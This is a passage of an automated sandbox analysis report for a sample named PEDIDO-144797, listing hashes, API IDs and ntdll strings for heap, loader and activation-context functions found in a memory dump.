• Instruction ID: fc62db56d78ddc94e2fd92bdd624677860a81a9206f59519714210c1b415a86d
• Opcode Fuzzy Hash: 13824fb9fe6f770ab6858871dd403ae07ce01029fcdf53fc6c00bc7824860a06
• Instruction Fuzzy Hash: 4390023120110812DD80755C570465A10054BD1311F91D45AA0125A14DCA268A6D77A1
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26f81830f21d5e7869c24bc0830c3022db567386eecd5dbed3af36b0d154be03
• Instruction ID: 738030536dc7d0d8dad5746ac230881eb30871cc9b7c76db640dae6b9e188dd6
• Opcode Fuzzy Hash: 26f81830f21d5e7869c24bc0830c3022db567386eecd5dbed3af36b0d154be03
• Instruction Fuzzy Hash: CD90022160510412DD40755C671871610154BD0211F51E456A0124914DC66A8A6976A1
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f81c8a2da8a4903f3d05681cf90560e339adc56efe52a503c6671845ed5b2b91
• Instruction ID: 897100bf4500ebe5c2f582e691f1e50d7fda5a174c99117cf76128298b8fa388
• Opcode Fuzzy Hash: f81c8a2da8a4903f3d05681cf90560e339adc56efe52a503c6671845ed5b2b91
• Instruction Fuzzy Hash: C590023120110852DD00655C5704B5610054BE0311F51D45BA0224A14DC626C8657521
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cdf41735ba4734afa7d89293cd846ec09f661f9b51768643bee3cb8a32ac112f
• Instruction ID: a0f6920fce04fb1c18a77c574a73eec446382b4e2cc738612d63a3ba6239887f
• Opcode Fuzzy Hash: cdf41735ba4734afa7d89293cd846ec09f661f9b51768643bee3cb8a32ac112f
• Instruction Fuzzy Hash: 8C90022124515112DD50755C570462650056BE0211F51D466A0914954DC56688697221
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 120cbe09b0465e931682ff97125b63826ac38286083194e5a92ecfe879552a25
• Instruction ID: 2a36148c579326a489bad01de433f3c328744daa76fb4ffe4ad0f31668f176fc
• Opcode Fuzzy Hash: 120cbe09b0465e931682ff97125b63826ac38286083194e5a92ecfe879552a25
• Instruction Fuzzy Hash: 38900225211100130D05A95C170451710464BD5361351D466F1115910CD63288756121
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca0b6311ee5e9650e2f46c0431245e19a8428ee1c23730705a8df325749c22a3
• Instruction ID: e977a3de33da3a7456edbb318783ebf709fa27d45ffea254c965f73bd0d69dcf
• Opcode Fuzzy Hash: ca0b6311ee5e9650e2f46c0431245e19a8428ee1c23730705a8df325749c22a3
• Instruction Fuzzy Hash: 219002A1201240A24D00A65C9704B1A55054BE0211B51D45BE1154920CC5368865A135
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: 5c6de5142f11cd2f6d201033fe94129b076719bb02ca427674e631ac9c93164f
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:

Control-flow Graph
[Graph rendered in the original report: basic blocks of the function spanning 3277a1f0 through 3277a51d, with calls to 326b2330, 326b24d0 and 326e4b50 and repeated calls to RtlDebugPrintTimes; blocks were marked as executed or not executed in the rendering]
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: HEAP:
                                                                                                                                          • API String ID: 3446177414-2466845122
                                                                                                                                          • Opcode ID: 5aeaa8808a901ac19b8c354ea1fd630c59d316bda5a623b504040588bc738a26
                                                                                                                                          • Instruction ID: 2138f9cc709cd7cba00a42a3e70122ef9b42e662f41ee209b67cb783b0bd2e19
                                                                                                                                          • Opcode Fuzzy Hash: 5aeaa8808a901ac19b8c354ea1fd630c59d316bda5a623b504040588bc738a26
                                                                                                                                          • Instruction Fuzzy Hash: 22A17E766043118FEB04CE1CC894A2AB7E6FF88354F14496DEA45DB361EB72EC46CB91

                                                                                                                                          Control-flow Graph

• Control-flow graph figure (rendered graph; raw edge list omitted): function starting at 326d7550, with its main blocks in 326d7550-326d7639 and out-of-line blocks in 32714443-327145db. Block 32714456-327144c3 calls 3272ef10 and 326e8f40 and references RtlDebugPrintTimes and BaseQueryModuleData; blocks 327144f5-3271452e (also calls 326ea9c0), 32714530-32714541, 32714546-32714576 and 32714591-327145ae (also calls 3271cc1e) each call 3272ef10 and contain the xrefs listed under Strings below. Other called routines: 326ae580, 326d7738, 326d76ed, 326d7648, 326d763b, 326e4b50, 326e4c68, 326e2b70, 326ea690.
                                                                                                                                          Strings
                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32714460
                                                                                                                                          • ExecuteOptions, xrefs: 327144AB
                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32714507
                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32714530
                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3271454D
                                                                                                                                          • Execute=1, xrefs: 3271451E
                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 32714592
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                          • Opcode ID: 0295760d8aa9f4c4ce484f2b8c061f80aca484323066bf6f8c81d7c5a33e6981
                                                                                                                                          • Instruction ID: 040d295c9bfb88cc11cd7053b22cbea129c67617fae19fa70b3f0792a39a120f
                                                                                                                                          • Opcode Fuzzy Hash: 0295760d8aa9f4c4ce484f2b8c061f80aca484323066bf6f8c81d7c5a33e6981
                                                                                                                                          • Instruction Fuzzy Hash: D3510675A0031DAAEB16DAA4DC95FAD73A8FF08354F5004E9D905AB180EF70AE41CF67
                                                                                                                                          Strings
                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 327077E2
                                                                                                                                          • Actx , xrefs: 32707819, 32707880
                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32707807
                                                                                                                                          • SsHd, xrefs: 326BA304
                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 327077DD, 32707802
                                                                                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 327078F3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                          • API String ID: 0-1988757188
                                                                                                                                          • Opcode ID: 946a3ba65a2e75aacc2a832e49323f317ef167919dfa441276b6b51053925c63
                                                                                                                                          • Instruction ID: 02243999dda72f2b937c07cf40936ddc315ef12e10e224d8c7941dee1c73e80d
                                                                                                                                          • Opcode Fuzzy Hash: 946a3ba65a2e75aacc2a832e49323f317ef167919dfa441276b6b51053925c63
                                                                                                                                          • Instruction Fuzzy Hash: 08E1F5756043028FEB19CE2ACC90B5A7BE1BF84368F544A2DED55CB291DB31DD49CB82
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32709153
                                                                                                                                          • Actx , xrefs: 32709315
                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32709178
                                                                                                                                          • GsHd, xrefs: 326BD794
                                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32709372
                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3270914E, 32709173
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                                          • Opcode ID: c0ead22aaa65c217a9c1ef10391b4da6b2cdb49f2180d18044fd54457bb48084
                                                                                                                                          • Instruction ID: 786b85987309fa25456a090df32487cd200d52fa7a4bd8a5b666d4a9fb728fd4
                                                                                                                                          • Opcode Fuzzy Hash: c0ead22aaa65c217a9c1ef10391b4da6b2cdb49f2180d18044fd54457bb48084
                                                                                                                                          • Instruction Fuzzy Hash: 72E19E74604341DFEB14CF15C880B4AB7E5BF88B58F408A6DE9959F292DB71E848CF92
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                                          • Opcode ID: cda3bd98e2d0e82ce8c2c16f9a357a73c9ff63c362f43876b4eddac2afeb3b60
                                                                                                                                          • Instruction ID: 42c9fbd19650bbbecd8d06c1df96b4bb7ce0ec2cf32f49bd56bab5b163b35489
                                                                                                                                          • Opcode Fuzzy Hash: cda3bd98e2d0e82ce8c2c16f9a357a73c9ff63c362f43876b4eddac2afeb3b60
                                                                                                                                          • Instruction Fuzzy Hash: AF416DB9A01309AFDB01CF94C980ADEBBB6FF48754F100169EC04BB351DB75AA42CB91
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                                          • Opcode ID: 50586720c6dc5d57bffe66b2959c9d1ae3269c2b29dd0de61938f3660abe48a1
                                                                                                                                          • Instruction ID: b6d01699051f54d190256942bf66ff6af998d34439d79901fea0634c9fd4f6d0
                                                                                                                                          • Opcode Fuzzy Hash: 50586720c6dc5d57bffe66b2959c9d1ae3269c2b29dd0de61938f3660abe48a1
                                                                                                                                          • Instruction Fuzzy Hash: 7071F175A01689DFDB02CFA8D490AADFBF2FF4A314F04805AE445AF251CF719982CB55
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 326F9854, 326F9895
                                                                                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326F9843
                                                                                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326F9885
                                                                                                                                          • LdrpLoadShimEngine, xrefs: 326F984A, 326F988B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 3446177414-3589223738
                                                                                                                                          • Opcode ID: 70e656b24dfb28b44bc13a6c4ad166cce7f51239e8bba95be21f860c832c0cc8
                                                                                                                                          • Instruction ID: 03b74b64a03844fefdfd4800b898854ed3f2b2ebc4328195bedfa4921f53a920
                                                                                                                                          • Opcode Fuzzy Hash: 70e656b24dfb28b44bc13a6c4ad166cce7f51239e8bba95be21f860c832c0cc8
                                                                                                                                          • Instruction Fuzzy Hash: A0511136A01394AFEB14DBA8C894FDD77A2BF40314F140569E511BF295CFB19C82CB82
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                                          • Opcode ID: 8bce7c11ec600fd3b3f1bec1911fd9d9aa6efe17a6552ac086855fe2bacd9ffe
                                                                                                                                          • Instruction ID: 1b17d19b1efd7c815cfea97285e52410720748c05abdca8eac2f54ebee9609d5
                                                                                                                                          • Opcode Fuzzy Hash: 8bce7c11ec600fd3b3f1bec1911fd9d9aa6efe17a6552ac086855fe2bacd9ffe
                                                                                                                                          • Instruction Fuzzy Hash: 6F416975604750DFE306DF68C484B4AB3E5FF41324F0489A9EC059B282CF79A986CF92

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
• API String ID: 3446177414-1222099010
• Opcode ID: 05ab1f13c948bb91cf0295ec81a10160e0c89361188c7d4fd14893c1a39f5330
• Instruction ID: 35104b00117d8b1f5433c49d7ed2af1437f31b40542d59f37d9ee87f618aac23
• Opcode Fuzzy Hash: 05ab1f13c948bb91cf0295ec81a10160e0c89361188c7d4fd14893c1a39f5330
• Instruction Fuzzy Hash: A73159B51157D4DFE726DB28C418F8A77E8FF01768F044498E8014B652CFB5E986CE52

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $$@
• API String ID: 3446177414-1194432280
• Opcode ID: ea55dcecc0712126bf3a2d621a147fc2b2d236fa2ea3f815d3233f3442d47f5f
• Instruction ID: bb79ec1d2adae6a44f18b3075687882f69084b0e27ec5f179dd8ed00e7cc4692
• Opcode Fuzzy Hash: ea55dcecc0712126bf3a2d621a147fc2b2d236fa2ea3f815d3233f3442d47f5f
• Instruction Fuzzy Hash: C6814AB2D012699BDB25CF54CC45BDEB7B8BF08744F0081EAA909B7240DB709E85CFA5

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
• API String ID: 3446177414-3610490719
• Opcode ID: d8538aa2b7fad1f9e8b07f48b65b376af99e4c7108f71190412b5312184763a3
• Instruction ID: 4d4aa20c3538e24520be439b8d4b088426250d08cc642b40f16035fa77a9fc7a
• Opcode Fuzzy Hash: d8538aa2b7fad1f9e8b07f48b65b376af99e4c7108f71190412b5312184763a3
• Instruction Fuzzy Hash: 1391F071704740EFE71ACF24C894BAEBBA9BF84B44F020459E8519B281DFB5E845CBD6

Strings
• minkernel\ntdll\ldrinit.c, xrefs: 32709F2E
• LdrpCheckModule, xrefs: 32709F24
• Failed to allocated memory for shimmed module list, xrefs: 32709F1C
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-161242083
• Opcode ID: 40eaf463c7079f37036f149fddffc24f47b0a8576c519ddfcec4ec6495980100
• Instruction ID: c8e4b391267d25f7c4a26cdac620128ede1f780903093acb7c7b50d308bdf765
• Opcode Fuzzy Hash: 40eaf463c7079f37036f149fddffc24f47b0a8576c519ddfcec4ec6495980100
• Instruction Fuzzy Hash: 1371DD75A00715DFEB18EF68C990BAEB7F1FF44708F148469E901AB250EB71AD82CB51

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 8107ca1e032108a9bedac8ea8090f38db2009b3d61c0c8d2b4016942ef7d6601
• Instruction ID: 335ee85042d318be1af4ece9a3840126e37d91ece0557ed4f36aa56252399e4e
• Opcode Fuzzy Hash: 8107ca1e032108a9bedac8ea8090f38db2009b3d61c0c8d2b4016942ef7d6601
• Instruction Fuzzy Hash: 2F512579715A12DFFF08CE58C8A4A29B7F2BF89354B104569D906DB760EB72AC41CB80

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes$BaseInitThreadThunk
• String ID:
• API String ID: 4281723722-0
• Opcode ID: 0b2dc43e2efa831b3191b4a2f373bff2a15b38d12146ef482ca4cbc223a9a183
• Instruction ID: 764f478de5f0ce02c6c15cc0b870d4e93978a1e8800e6c2304b5b9087af97f0c
• Opcode Fuzzy Hash: 0b2dc43e2efa831b3191b4a2f373bff2a15b38d12146ef482ca4cbc223a9a183
• Instruction Fuzzy Hash: E4314075E41228DFCF05CFA8D885A9EBBB1BF48320F10056AE911BB290CB306942CF54

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: b50dacb9b2cdb534bec74f12bc079f1d1c1110c0fdbc087eb8a100d10486e1b1
• Instruction ID: 4c40b4e09b99d5b35062bc46bbdf15e40b5001e6418dce35e7d05449c3dad42d
• Opcode Fuzzy Hash: b50dacb9b2cdb534bec74f12bc079f1d1c1110c0fdbc087eb8a100d10486e1b1
• Instruction Fuzzy Hash: 9E3226B4D003699FEB25CF64C9A4BD9BBB0BF09344F0081E9D549A7291DBB45E88CF91

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: HEAP: ${t2
• API String ID: 0-3603856192
• Opcode ID: 8b609a9a9b5fe58becd317c7437886b586dddf74e3e64ea3de9fd99dd372259d
• Instruction ID: 9662c5fddd5c1706d0d82aaab34708c7084d6d025390e860345079f3d39638ef
• Opcode Fuzzy Hash: 8b609a9a9b5fe58becd317c7437886b586dddf74e3e64ea3de9fd99dd372259d
• Instruction Fuzzy Hash: 27B18A71A0A345DFD710CF29D880A5BBBE6FF85754F404A6EF9949B290DB30D904CB92

Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: 0$Flst
• API String ID: 0-758220159
• Opcode ID: 364c9c6b015ce21a230426abd59ffd8fe4778b58a1924834bcb81664158ceb7f
• Instruction ID: ac2316d812e4c2f606e22748306d4946c644a1bcef2966fa52e1a0c28e411a7c
• Opcode Fuzzy Hash: 364c9c6b015ce21a230426abd59ffd8fe4778b58a1924834bcb81664158ceb7f
• Instruction Fuzzy Hash: 8D519AB5E01348CBEB24CF94C484799FBF5FF44794F14882AD449AB240EBB09D86CB90

Strings
• kLsE, xrefs: 326A05FE
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 326A0586
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 3446177414-2547482624
